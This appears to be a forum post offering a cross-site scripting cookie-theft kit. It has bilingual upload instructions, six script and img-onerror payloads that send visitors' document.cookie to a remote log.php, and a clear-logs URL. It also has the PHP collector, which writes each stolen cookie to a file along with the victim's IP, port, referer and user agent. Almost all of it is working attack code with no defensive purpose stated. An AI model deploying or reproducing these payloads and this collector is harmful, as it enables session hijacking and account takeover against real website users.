instruction.txt (
):
Code:
####################################################################################################
# Installation:
####################################################################################################
German: Laden sie den Inhalt aus dem Ordner "upload" auf ihr Webverzeichnis hoch!
English: Upload the content from the "upload" folder to your web directory!
####################################################################################################
# Payloads:
####################################################################################################
<img src="*" onerror="new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);" alt="" height="0" width="0" />
<script>document.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>location.href='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>new Image().src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>var x = new Image();x.src='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
<script>window.location='http://target.net/test/log.php?cookie=' %2b encodeURI(document.cookie);</script>
####################################################################################################
# Clear logs
####################################################################################################
http://own-server.net/test/log.php?clear=1
log.php (
):
Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown"))
$ip = $_SERVER["REMOTE_ADDR"];
else
$ip = "unknown";
return ($ip);
}
function logData()
{
$ipLog = "data.log";
$cookie = $_SERVER["QUERY_STRING"];
$register_globals = (bool) ini_get("register_gobals");
if ($register_globals)
$ip = getenv("REMOTE_ADDR");
else
$ip = GetIP();
$rem_port = $_SERVER["REMOTE_PORT"];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
$rqst_method = $_SERVER["REQUEST_METHOD"];
$referer = $_SERVER["HTTP_REFERER"];
$date = date("d.m.Y - H:i:s");
$log = fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "####################################################################################################<br /># Date{ : } $date<br /># Cookie: $cookie<br /># IP: $ip<br /># Port: $rem_port<br /># Request-Method: $rqst_method<br /># Referer: $referer<br /># User-Agent: $user_agent <br />####################################################################################################<br /><br />");
else
fputs($log, "####################################################################################################\n# Date: $date\n# Cookie: $cookie\n# IP: $ip\n# Port: $rem_port\n# Request-Method: $rqst_method\n# Referer: $referer\n# User-Agent: $user_agent\n####################################################################################################\n\n");
fclose($log);
}
if (isset($_GET["cookie"]) && ($_GET["cookie"] != "")) {
logData();
} else {
}
if (isset($_GET["clear"]) && ($_GET["clear"] == "1")) {
$string = "";
$fp = fopen("data.log", "w");
fwrite($fp, $string);
fclose($fp);
} else {
}
exit();
?>
Download:
